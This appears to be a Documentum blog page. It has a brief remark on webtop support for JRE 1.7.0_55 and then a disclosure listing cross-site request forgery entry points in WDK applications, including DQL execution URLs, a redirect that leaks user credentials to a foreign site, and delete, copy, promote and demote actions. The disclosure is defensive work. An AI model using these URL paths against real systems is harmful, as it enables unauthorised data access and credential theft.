Dumb UCF applet

It seems that EMC has changed their release policy, and now we got support of JRE 1.7.0_55 in webtop within two weeks after general availability of JRE 1.7.0_55, or may be it is just a happenstance, judge for yourselves what is more probable, below I provided release dates of JRE and corresponding webtop versions (actually, it’s worth to note that both webtop 6.7SP2P05 and 6.7SP2P07 did not support corresponding JRE versions fully – it was required to relax JRE security settings to get working UCF):
Continue reading

documentum security vulnerabilities: multiple XSRFs in WDK applications

Cross-site request forgery attack is completely described in WikiPedia, below is a list of URLs (or components) in WDK applications (like Webtop, TaskSpace, EPFM, Documentum Administrator) vulnerable to XSRF:

DQL execution

  • /webtop/component/dqleditor?query=<query>
  • /webtop/component/appintxdql?query=<query>
  • /webtop/component/search?queryType=dql&query=<query>
  • /da/component/auditlist?query=<query>
  • /webtop/component/historicalactivityreportresults?process_id=0000000000000000&query=<query>
  • /webtop/component/processdetailreportresults?process_id=0000000000000000&query=<query>
  • /webtop/component/historicalprocessreportresults?query=<query>
  • /webtop/component/historicaluserreportresults?query=<query>
  • /webtop/action/view?objectId=<objectId of dm_query object> (executes /webtop/component/search?queryType=dql&query=<query>)
  • /webtop/action/search?queryType=dql&query=<query> (executes /webtop/component/search?queryType=dql&query=<query>)

other

  • /webtop/component/virtuallinkconnect?redirectUrl=http://url&virtualLinkPath=/webtop/component/main (sends user credentials to foreign site, found in 6.7SP2)
  • /da/component/scsaveas?objectId=<objectId> (creates copy of objects, potentially can be used to apply less restrictive ACL to copy)
  • /webtop/action/deletenotification?type=dm_notification&routerId=0000000000000000&objectId=<objectId> (deletes dmi_queue_item object)
  • /webtop/action/demote?objectId=<objectId> (demotes document)
  • /webtop/action/promote?objectId=<objectId> (promotes document)

components could be launched either directly (as in examples above) or through container:

  • /webtop/component/dialogcontainer?component=search&queryType=dql&query=<query>&componentArgs=

or through appintgcontrollerlogin component:

  • /webtop/component/appintgcontrollerlogin?dispatchitem=search&dispatchtype=component&queryType=dql&query=<query>

actions could be launched through ActionDispatcherServlet (as in examples above) or through actiondispatcher component:

  • /webtop/component/actiondispatcher?action=search&queryType=dql&query=<query>

or through any component:

  • /webtop/component/main?startupAction=search&queryType=dql&query=<query>